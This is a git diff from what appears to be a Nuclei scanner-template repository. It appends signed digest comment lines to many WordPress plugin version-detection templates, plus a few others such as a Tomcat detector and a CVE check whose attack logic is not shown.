.../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 203 files changed, 203 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-47117.yaml b/http/cves/2023/CVE-2023-47117.yaml index 852390742c..2297aeeeb2 100644 --- a/http/cves/2023/CVE-2023-47117.yaml +++ b/http/cves/2023/CVE-2023-47117.yaml @@ -70,3 +70,4 @@ http: regex: - 'me="csrfmiddlewaretoken" value="([a-zA-Z0-9]+)">' internal: true +# digest: 4a0a00473045022100efb2bff232c70a7681dabfdbe49a60c516fcd5f5e446af96976aa8295a59d6b20220612431a6a43f670e2023f79605bdb673f619d459e4d74126b8bfc430ff91f9af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/label-studio-signup.yaml b/http/misconfiguration/label-studio-signup.yaml index e8a135069a..032f916e24 100644 --- a/http/misconfiguration/label-studio-signup.yaml +++ b/http/misconfiguration/label-studio-signup.yaml @@ -32,3 +32,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402205360b5136f0174241907a5708d4bfa1d8a1e466da79575530410a753cf7a7ae10220244689bc748ea06f098089b5ddb8fe157a180c13c1700ae1036e03707fb66178:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/tomcat-detect.yaml b/http/technologies/apache/tomcat-detect.yaml index d0f7766b8e..d280a431db 100644 --- a/http/technologies/apache/tomcat-detect.yaml +++ b/http/technologies/apache/tomcat-detect.yaml @@ -50,4 +50,4 @@ http: group: 1 regex: - '(?i)Apache Tomcat.*\D([1-9]*[0-9]\.[0-9]+\.[0-9]+)' -# digest: 4a0a00473045022100fca2e0dd8b0953b8a8837d98c56383f35619beaedd8dfc8f44fe4a3820a6960702206af63b29495b54a859bbd87226e420f128c28d0b95eaafd8ad0d71b2133529c7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c7ad3510b2c6dc10c45c3deac9f3cbad44bb521e0c0286cfb8efde11d1073d7b0220593b27d38c23aaa64da406ecd3a73720d4d002b7d3fd03324c34140909bb39ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..a507a6762a 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f1b81f8f99ad55b560dc2f891eef529855c46e93bcb26611e8361b9400372ac9022100aec746fa40c9efeddfc7439c2f154a22df8fb793a2543f9df8399069e028a300:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..314b5c4c97 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bab30c9cb38699addf360828ccb10dec7df2f2d96fe37b3bea1151a1149ead68022100ba5bb5ef722daf501e054791833625fb2ba4403f16c5b8068d37c17ecec9aaff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..386cea8171 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204f672e45ac65c8d90849d9793acc5aff780b47efb6a29293ab2262405f013be7022007d4b677a87f14355251fbcb6afa9e2eb52d0a5d7a5b07de9cc1b9f7c9ceed76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index cddbb4bb2e..92ffa0675a 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205b7f2b30dec6ee342586ed333438ce3587f820d8af2f7f260a870fdda84a98cf022100a408a03bd95a4a57fceba937af2644bc252829c5442bd663c88452ae3fb67374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..2593a74c35 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017c2832d99c14709b83dbba8b481843b63c3e6b63c32edbe0f3399d6620e8796022100e565e94358ed0edfc9d6febd4876ac0c21fa88623eea41c83bae5c9fe0b55feb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..dd98f79253 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201a17e1d427645c45bdba424e8142e0086e2825ec635168a770c3b63fb0f3db5102201ff06030cd7bff99406b43771507863b7535767fedd51d444d6dae2d94ff584b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..5c69b16dc5 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009855ca9cfbef0b90d05c9e318d6651f602c369a4d12fc5979c16711191d7857a022047d0346885fb6185b1e0319855abfeca6fd37f3cf78234e90eea7ee0f69ff39b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..99ae3c0fb6 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100912f7927a6325615ac506e0e72f1d13ceb196bbf99cec0daff2274ebceedb2e002203dcdd8a6b992ab1efc31ab5a6c07563ef17cbac0b5a4aba4191658ae02583fb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..f416e413c6 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f92e789c8329e8132fd7c6cc83cd6e7adf19f58ebf8868590418eb8e6a17eb19022100b987f096391b8a41bd3dfc2bd9abfa0bd3f7e891a1ddb6898cfaed4085a67e8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..4eab9b61d4 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204b93f0efcd936ae747f465002df7e860b127fc257d612efd97a8d003f6d3d712022100a4a08ee7ef065169a8e1e4c8dff71432c797a1010bdd523a62f7cb3abfc6bc63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..3f2799d865 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202d13db1a93ffa3cce9972f31ef0d5da2f96dd3036504d444af5e3d367cd61afe0221009e77584fb5fe674a0c28c7b45221969c87be53e8542a5d8ac280dcc62cccdfad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..be32000168 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220799a67fe57b5c4a874133a228119141b65927ad9f4e5e64d3f5b7bf70cef7a02022100ca463dc0c68f265f2b4883872f5006a26bd033ef77c545dfa642d6bffc758729:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..5f15e6a5af 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 480a00453043021f4183e9d754855e6faf86b570ecbc3a1f8d36e432440d2e8b1beda3062c5fd5022016f6b3e52721154f19ec5643539bf91314bbd55308c59abba6ac17bb7b1e4254:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..517bc931be 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220093e70976a3fd5755d2af6758adc8e9efa54dc4e8c6ac502aaf57c9f63966deb022100dfa06decbc018368c991e2873334efe12467c4660d2ef6a9fbb704be83cb1e95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..00eec9947c 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b7cdec71c5d0dff3641789276ea334795561c04ab44aca775e4aa5e1f3fbd6302207be5d695428b69d96f3e331ff2c05c4df7baa7f28ebecb93019cb230d4ab3edc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..89d12e0438 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207afc2f2adedf26285b194b90675906dae63aa3d06a5958cb873c2633fef8320c022100e2c62898c0ee6cef9f48fb0c824abc4f49795a744f309e02c1ed3d0dde08a6e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..0494305bc9 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b5778b054954e22ba541db93ca3634794815de57d8edc3eddba0f20ecf4a6b3c02205630dcf1c281c909ad8aac35985bc96fbe8c153d096aa39cae33514377064083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..af13d021ae 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207c8999d4396b34a2e565536afaa43a0ef6025c2fb1a1ccd0ac9a97540afd04860220013ffea4c783598a788536e5ebdc5e87480fb3b821fcd12e1a8a90ef847d758d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..1f108078bd 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b31c973705b9ca065b738c800c2ebfff149e0bb533baa5babbab38971da65f802206273c17e5c762f1e2c91adf454fe9108d21fd83cd055d57f4022c7c99f3291f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..7f98ca5aac 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022016413e8b7d006e1440f49674f9ca01173a6790844185acdcbb65e9096869bb7c02200874dabae31aa1f99857262f37fcd90ddeb84f8765d46cc46b95544ed5a4cb78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..4113623f95 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022023e517ea8294606a610bd2a768297497b33a750cb180859b201331bbcec995f1022074d013740e6b3f8ef3ae1e46a78d8eca5d4aabb03e615a45abdfce39bcf91fb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..14d079288d 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a642d7e482ad846e69be24d719e06ec7be8eba77ec2a5aed763b658db73fcc33022030e60e6f32cf28fb7447b7977f5b73b508507c90b29e3807a39c8b59cd9b46a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..92fe187ca9 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207f00df574868624812df9c706c4997da8ebf961760e7eadbb51889929fc31af60220734216b76d367171a21d0aaa7ac9ce2c4ef70503c34b5a799546051b317db7de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..938ab503af 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fa1e0c394c7e4dd643d87ffb0f2c308cc523b0cf2510a39f9b809a7f70555ca0022100eb96be6d985dbd366ff7f1a005c25f4d894b521368005fe572cde359305b81cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..4ecacb1ff4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bd1797f94ac92c06e2c376b0fe9e1ffbcee0ee19410b60d71b2d6f626f29f20c022037ae02d30745842258984cb0a5b9d9cf202ab6814ffe70f512f282019b3789d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..22a3b18d54 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009358acc60bc6fbcacde1bbb504a5f66fc9b9aa120ddd6209fdc0ff21ddcd414402204cbc9ac83321426651197104c63aa2f5a2f7078fcc418cd2d16380cf51319269:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..4343115807 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e1f54c43ca1ff173c3f2bf88709fe22919289c8d02658d3c6f4d3bffdaded47f022100d770859e9f6570208a07efbdd8d47cf9b25bf9944bfb96ed0642e6f4f9ec8f83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..fc10839c43 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022066554eaf453f3fe9343901b03bea1e1736f9e2888a035d962c44592057058cf902207717f244909a32407990497408f9ea748b2ca37076f08924b6e2d7cc850ed15c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..d8f24ef6c6 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f8129def4f322736a925a1d0aec3f4e931b44c039a335f4b43fd4a08b79d7548022100d11744290010cfef23f32a53ed02a45b19b1cecac99963b3a804de5ecb4fac4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..517c4059c7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f2770f709ef53f51be64046e2c8aa2292ac0dd4af8a269528113c474ae4e31e9022100f945cda11fe4ab1bd859eef4ad9aa4adf7e061db9736cdbf377774de066a6c16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..a3c59294f4 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204e6ff8b512de2a41e00d67354e085b3341202934874442828d9861a0e921d527022100efb37992ba2b7436758010a77aae254c8ad711b40ccd66bd31b8f70b079da014:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..1dc572e501 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5e2b655d0ee6c9066d70c7eb767b4e42baf277f3a45570a60f1d33e4b247199022100a847e32d99a9cfce790ca243816462cfad55e3d767d58e328a8aea0391a60900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..424f9d03fe 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203927b8d688133b68dec6fc57bdfff6e5a1619af7925fddc90f8a77c7e89baecd022100fcc86bed2c04b07bbdac052e0dc1b2e9c379c42826c2fabd9839f449a8290029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..761f8bc523 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201d972c34f9b0ceba250618bc402a81baa8813bf8eebe32eedfe2da7958c19ca7022100b2777914ed24e4cc296932c6348eadb558e7f43e87137bb212f43317fb14515a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..318b7fbf71 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100941e81eca8a035c8c7f760027500a96c958abd87a953ec7e9ec892bb7fe14f2b02207cff2fff5cb70d0df02847b0f3c73d34928fc4ddf2d3aba74b04f1b96f7d7fbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..68533344b9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c7c49ce473fe3c7d2f8485e2fbe5cbeed1d6f91ce4bb6f7fcf053459f671ac0c02202248520fe8da4ddfce819c06009e0a90c4c8cba1e4db8cacf5add83ade277d20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..374875adf9 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a413fc22ea5a51e87384ae6d922daf84cc41df0b31f60bc509f4a200b4fcf785022023fdbd3d9bc848e93ad6a44955b6de458216c44cbf6ff1bc72a9f9c32ddcc4ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..72d53c149b 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009e1fbe540038966b984f1b568937fb1a3f7853f7d98fc0514beebbcfb363a99b022100a19ca0747afb98ecd926f2fdc0b08cd1f13ebda1c9129fadb5e898104189a599:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..4b5cfb54e3 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022016383c0a6ad4f22dada06af18e310442467f8345559b73d3953884fd6cf8835f022007c191d61d73240344c8b9c563b64bf85f248d0df8d53faba640600658f6291b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..9dfaea498d 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220318d095910cbbe370ce81ed9d5cac22aba5b75de54e7fb417d43b7ec46b49770022100b62ff76be0e817d883f7bc0a4828cdbffeb01fde8b4517517d15c76034081dd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..e45c166b4d 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 